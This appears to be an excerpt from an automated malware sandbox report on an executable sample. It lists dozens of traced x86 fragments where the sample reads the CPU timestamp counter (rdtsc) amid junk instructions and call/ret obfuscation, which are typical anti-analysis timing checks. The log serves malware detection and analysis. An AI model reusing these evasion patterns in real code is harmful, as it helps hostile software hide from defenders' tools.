Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0B78 second address: 9C0B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jbe 00007F9DF58A6BE2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0B8B second address: 9C0B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0251 second address: 9C0255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0255 second address: 9C026F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9DF4F36016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9DF4F3601Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C026F second address: 9C028D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F9DF58A6BE8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0674 second address: 9C0684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9DF4F3601Ah 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0684 second address: 9C068D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C068D second address: 9C0693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0693 second address: 9C06D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F9DF58A6BE1h 0x0000000d jns 00007F9DF58A6BEDh 0x00000013 jmp 00007F9DF58A6BE7h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F9DF58A6BDAh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C06D7 second address: 9C06E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9DF4F36016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0836 second address: 9C083A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C083A second address: 9C0840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0840 second address: 9C086D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9DF58A6BE8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9DF58A6BDDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C09B0 second address: 9C09B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C09B4 second address: 9C09BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C09BA second address: 9C09F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9DF4F36025h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F9DF4F3601Dh 0x00000013 popad 0x00000014 je 00007F9DF4F36022h 0x0000001a ja 00007F9DF4F36016h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C3076 second address: 9C308B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jp 00007F9DF58A6BF2h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F9DF58A6BD6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C3118 second address: 9C3139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 35AF26BEh 0x0000000c sub esi, 08C7A244h 0x00000012 push 6453FB2Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007F9DF4F3601Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C3139 second address: 9C313D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C328A second address: 9C3294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F9DF4F36016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C3294 second address: 9C32AF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9DF58A6BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F9DF58A6BDCh 0x00000015 jnp 00007F9DF58A6BD6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C36BC second address: 9C36C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C3D7B second address: 9C3D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C3F17 second address: 9C3F30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F9DF4F36035h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C434F second address: 9C4359 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9DF58A6BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C484F second address: 9C4853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C4853 second address: 9C4864 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9DF58A6BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C4864 second address: 9C487C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9DF4F36021h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C8798 second address: 9C879F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C8590 second address: 9C8594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C879F second address: 9C8809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 call 00007F9DF58A6BE3h 0x0000000d cmc 0x0000000e pop edi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F9DF58A6BD8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b jmp 00007F9DF58A6BE9h 0x00000030 push 00000000h 0x00000032 and si, BD45h 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C8809 second address: 9C8813 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9DF4F36016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C8813 second address: 9C8820 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C922D second address: 9C92C2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9DF4F3601Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d xor dword ptr [ebp+12453C29h], ecx 0x00000013 jnc 00007F9DF4F36020h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F9DF4F36018h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 adc edi, 352BE5D3h 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F9DF4F36018h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov edi, dword ptr [ebp+122D3D12h] 0x0000005d sub esi, 04C4801Bh 0x00000063 mov dword ptr [ebp+122D1861h], edi 0x00000069 xchg eax, ebx 0x0000006a pushad 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e pop edx 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C8FB8 second address: 9C8FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C92C2 second address: 9C92C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C92C6 second address: 9C92CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C9AFD second address: 9C9B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CA55D second address: 9CA562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CB154 second address: 9CB158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CA562 second address: 9CA577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9DF58A6BDBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CA577 second address: 9CA57D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CB5B9 second address: 9CB5BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CC6DE second address: 9CC77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF4F36022h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F9DF4F36018h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jmp 00007F9DF4F36024h 0x0000002a push 00000000h 0x0000002c jl 00007F9DF4F3601Ch 0x00000032 mov ebx, dword ptr [ebp+122D3D96h] 0x00000038 or dword ptr [ebp+122D3037h], esi 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007F9DF4F36018h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 00000014h 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a mov bx, dx 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 jmp 00007F9DF4F36027h 0x00000066 pop eax 0x00000067 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CB934 second address: 9CB93A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CB93A second address: 9CB955 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9DF4F3601Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F9DF4F36024h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CB955 second address: 9CB959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CD740 second address: 9CD745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CD745 second address: 9CD789 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9DF58A6BDDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e cmc 0x0000000f push 00000000h 0x00000011 mov di, BF3Bh 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+1246B63Bh], eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F9DF58A6BE4h 0x00000026 je 00007F9DF58A6BD6h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CC96A second address: 9CC96F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CE6C9 second address: 9CE6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CE6D2 second address: 9CE6D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CE6D6 second address: 9CE719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D3BCEh] 0x00000010 push 00000000h 0x00000012 movzx ebx, di 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F9DF58A6BD8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov di, 7991h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push edi 0x0000003a pop edi 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CE719 second address: 9CE71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CE71E second address: 9CE729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F9DF58A6BD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CD8FE second address: 9CD923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jng 00007F9DF4F3601Ch 0x00000011 jg 00007F9DF4F36016h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D0964 second address: 9D0968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D0968 second address: 9D096E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D197F second address: 9D1983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D1983 second address: 9D198C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D294A second address: 9D294E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D294E second address: 9D2958 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9DF4F36016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D2A90 second address: 9D2AA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F9DF58A6BDCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D6DB0 second address: 9D6E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9DF4F36029h 0x00000008 jnl 00007F9DF4F36016h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F9DF4F36021h 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F9DF4F36018h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 sub dword ptr [ebp+124530BBh], esi 0x00000038 push 00000000h 0x0000003a mov ebx, ecx 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F9DF4F36018h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 0000001Dh 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 mov bx, A690h 0x0000005c xchg eax, esi 0x0000005d pushad 0x0000005e push edi 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D6E44 second address: 9D6E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007F9DF58A6BDCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D6E51 second address: 9D6E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 js 00007F9DF4F36016h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D60D3 second address: 9D60D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D8D0E second address: 9D8D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D7F70 second address: 9D7F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D7F74 second address: 9D7F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D7F82 second address: 9D7F86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D7F86 second address: 9D7F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D7F8C second address: 9D7F92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D7F92 second address: 9D7F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D9E8C second address: 9D9E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A240BB second address: A240CF instructions: 0x00000000 rdtsc 0x00000002 js 00007F9DF4F36016h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F9DF4F3601Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A2222A second address: A22255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE5h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push ebx 0x0000000d js 00007F9DF58A6BD6h 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A22255 second address: A22262 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9DF4F36016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A22262 second address: A22279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE2h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A223F0 second address: A223F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A223F6 second address: A22403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F9DF58A6BD6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A22548 second address: A2254E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A2254E second address: A22552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
